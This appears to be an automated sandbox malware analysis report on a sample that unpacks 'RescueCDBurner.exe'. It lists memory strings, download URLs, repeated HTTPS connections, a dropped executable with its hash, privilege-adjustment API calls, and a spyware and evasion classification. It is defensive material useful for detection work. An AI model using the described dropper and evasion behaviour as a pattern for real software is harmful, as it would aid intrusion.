Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49973 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50061 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50065 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50084 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50085 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50086 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50087 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50088 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50089 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50095 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50097 version: TLS 1.2
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile deleted: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009642FB1_2_009642FB
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009693981_2_00969398
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009314C41_2_009314C4
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009194F01_2_009194F0
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009424F71_2_009424F7
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0094940D1_2_0094940D
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0093469C1_2_0093469C
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0091F7881_2_0091F788
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009218D81_2_009218D8
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0095C80C1_2_0095C80C
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0094DAA41_2_0094DAA4
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0094EC051_2_0094EC05
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00963E501_2_00963E50
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00925F141_2_00925F14
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001B42FB2_2_001B42FB
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001B93982_2_001B9398
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0019940D2_2_0019940D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001814C42_2_001814C4
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001694F02_2_001694F0
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001924F72_2_001924F7
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0018469C2_2_0018469C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0016F7882_2_0016F788
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001AC80C2_2_001AC80C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001718D82_2_001718D8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0019DAA42_2_0019DAA4
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0019EC052_2_0019EC05
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001B3E502_2_001B3E50
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_00175F142_2_00175F14
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D476D602_2_6D476D60
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D46A50C2_2_6D46A50C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4884442_2_6D488444
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4764E82_2_6D4764E8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4761002_2_6D476100
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4803C52_2_6D4803C5
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D475D2E2_2_6D475D2E
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D487D852_2_6D487D85
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D481E1A2_2_6D481E1A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4619312_2_6D461931
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4759902_2_6D475990
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D46182C2_2_6D46182C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4878342_2_6D487834
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4754FB2_2_6D4754FB
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4693D92_2_6D4693D9
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4872E32_2_6D4872E3
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C66ECCD3_2_6C66ECCD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C639D653_2_6C639D65
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C64457E3_2_6C64457E
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C633DD03_2_6C633DD0
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C63867F3_2_6C63867F
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6397A03_2_6C6397A0
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C638F833_2_6C638F83
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6370933_2_6C637093
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C64911E3_2_6C64911E
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6509193_2_6C650919
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6221F03_2_6C6221F0
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6372703_2_6C637270
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6C7A5A3_2_6C6C7A5A
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C633A1C3_2_6C633A1C
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C63A2A73_2_6C63A2A7
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67A3DD3_2_6C67A3DD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6343A63_2_6C6343A6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 0091A2D7 appears 83 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 00911225 appears 865 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 00911228 appears 1402 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 00912ACF appears 56 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 009701DE appears 91 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 00957210 appears 33 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 6D447A7F appears 125 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 00162ACF appears 56 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 001A7210 appears 33 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 6D474745 appears 79 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 6D4746DC appears 355 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 6D4783C0 appears 42 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 001C01DE appears 91 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 00161225 appears 865 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 00161228 appears 1402 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: String function: 0016A2D7 appears 83 times
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: String function: 6C63B046 appears 49 times
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: String function: 6C630C80 appears 46 times
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: oeqwwe.5.drStatic PE information: Number of sections : 12 > 10
Source: qpfwaekftwavc.9.drStatic PE information: Number of sections : 12 > 10
Source: kXzODlqJak.exe, 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000002.1484982553.0000000000200000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000002.1486147378.000000006D4AA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameTXFTNActiveX.DLLR vs kXzODlqJak.exe
Source: kXzODlqJak.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal92.spyw.evad.winEXE@64/279@19/15
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096A747 FormatMessageW,GetLastError,LocalFree,1_2_0096A747
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096B884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,1_2_0096B884
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001BB884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,2_2_001BB884
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096FE01 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,1_2_0096FE01
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0097699C FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError,1_2_0097699C
